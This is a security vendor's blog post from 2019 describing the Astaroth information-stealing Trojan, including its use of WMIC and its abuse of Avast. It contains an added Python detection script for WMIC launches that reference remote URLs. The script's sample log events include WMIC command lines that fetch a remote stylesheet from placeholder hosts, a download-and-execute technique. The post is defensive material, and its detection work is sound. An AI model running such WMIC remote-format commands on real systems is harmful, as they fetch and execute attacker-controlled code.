FYI: The Astaroth Trojan

Feb 22, 2019 8:00:00 AM / by Carl Keyser

You might have heard recently that the Astaroth Trojan is making a comeback. We break down what it is, why it's making a comeback and more...

Despite having a name that makes it sound like a lost Michael Crichton novel or a Swedish Death Metal band, the Astaroth Trojan is a nasty piece of code. The trojan was first detected in 2017 after it was used in multiple South American cyber attacks.

Historically delivered by email and corrupt attachments, the Trojan uses Windows Management Instrumentation Console and its command line interface to download and install its payload. Typically it uses a non-interactive mode to hide what it's doing from the end user.

To avoid detection, Astaroth hid in plain sight, using a seemingly safe domain with an additional URL snippet added on that points to its payload. Past versions, upon being installed, would scan for antivirus software. If antivirus was found on the endpoint, the malware would shut itself down.
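
The following added example, which is not from the original post or from Cybereason's research, flags WMIC process launches whose command line references a remote URL, the download behaviour described above. The log records are constructed, their field names are modelled on Sysmon process-creation events, and the hosts are placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records (field names modelled on Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic os get /format:"https://storage.example.com/a/b/x.xsl"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "wmic logicaldisk get name,freespace /format:csv"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\notes\http://not-wmic.example.txt"},
    {"Image": r"C:\Windows\SysWOW64\wbem\wmic.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "WMIC.EXE  PROCESS LIST /FORMAT:HTTP://cdn.example.net/p"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Name of the switch that carries the URL, e.g. /format:"https://..."
SWITCH_RE = re.compile(r"/(\w+):\s*[\"']?https?://", re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_remote_wmic(events):
    """Return one finding per remote URL seen on a wmic.exe command line."""
    findings = []
    for ev in events:
        if basename(ev.get("Image", "")) != "wmic.exe":
            continue  # a URL alone is not enough; the process must be WMIC
        cmd = ev.get("CommandLine", "")
        switch = SWITCH_RE.search(cmd)
        for url in URL_RE.findall(cmd):
            findings.append({
                "host": urlparse(url).hostname,  # triage on host, not just domain reputation
                "url": url,
                "switch": switch.group(1).lower() if switch else None,
                "parent": basename(ev.get("ParentImage", "")),
            })
    return findings

if __name__ == "__main__":
    for f in find_remote_wmic(SAMPLE_EVENTS):
        print(f)
```

Because the post notes that the payload URL sits on a seemingly safe domain, the finding keeps the full URL and parent process rather than relying on domain reputation alone.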

This new version behaves differently. The Trojan's payload typically disguises itself as a JPEG, GIF or an extension-less attachment. Once downloaded and opened, the new Astaroth Trojan actually leverages antivirus software, specifically Avast Free Antivirus, to inject a malicious module into one of its processes. Upon installation, the malware begins to log keystrokes, intercept operating system calls and gather other PII to steal credentials and passwords.

Because Avast is one of the most used antivirus solutions on the planet, this could be a particularly nasty piece of malware.

The new variant was discovered by the fine folk that make up Cybereason's Nocturnus Research team (also not a Death Metal band...I'm starting to see a trend here...hmmm...).

You can read more about Astaroth here (https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil) on Cybereason's blog. We'll keep you up to date if we hear anything else regarding Astaroth. Until then, if you're using Avast we recommend you try something different. We personally recommend Cybereason's EDR platform or CylancePROTECT.

Have anything you'd like to share regarding this topic? Let us know by leaving a comment.

Topics: Malware, Cybereason, Trojan
